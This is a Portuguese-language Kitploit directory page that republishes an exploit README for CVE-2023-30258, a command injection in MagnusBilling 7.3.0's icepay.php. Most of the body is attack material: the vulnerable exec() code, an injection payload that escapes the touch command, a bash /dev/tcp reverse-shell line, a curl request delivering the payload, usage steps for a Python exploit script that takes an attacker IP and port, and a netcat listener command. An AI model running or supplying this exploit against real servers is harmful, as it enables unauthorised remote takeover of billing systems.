Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
magnus_billing_7.3.0_RCE_CVE-2023-30258 — Exploit para CVE-2023-30258: execução remota de código no MagnusBilling 7.3.0 via parâmetro 'democ' não sanitizado em icepay.php, permitindo injeção de comandos e reverse shell. | Kitploit
Ferramentas/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

Exploit para CVE-2023-30258: execução remota de código no MagnusBilling 7.3.0 via parâmetro 'democ' não sanitizado em icepay.php, permitindo injeção de comandos e reverse shell.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
2há 9 mesesAinda não revisado
Compartilhar

magnus_billing_7.3.0_RCE_CVE-2023-30258

Existe uma vulnerabilidade de execução remota de código no magnus billing 7.3.0, no parâmetro "democ" do recurso "icepay.php", onde você pode escapar da consulta e executar o comando que desejar.

CÓDIGO VULNERÁVEL

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

O parâmetro "democ" é passado para exec(), para criar um novo arquivo, mas como você pode ver, não há nenhuma sanitização de string, e o atacante pode facilmente escapar do comando touch e executar um comando ou até mesmo obter um reverse shell. Para contornar a extensão txt, podemos simplesmente adicionar outro ";" no final da string. O payload final ficaria assim:

root@kitploit:~
testfile;<command>;testfile

e é assim que ficaria quando passado para a função exec():

root@kitploit:~
exec('touch testfile;<command>;testfile.txt');

ex. reverse shell:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

exploração >:D

poderíamos usar curl para obter um reverse shell, ex.

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

ou se preferir, pode usar o script python deste repositório. Instalação:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # change directory

chmod +x ./magnusbilling_rce.py                                             # add execution permissions to the python script

uso:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # show help

./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/

e por último, mas não menos importante, lembre-se de iniciar um listener com netcat:

root@kitploit:~
nc -nlvvp <local_port>
Baixar ferramenta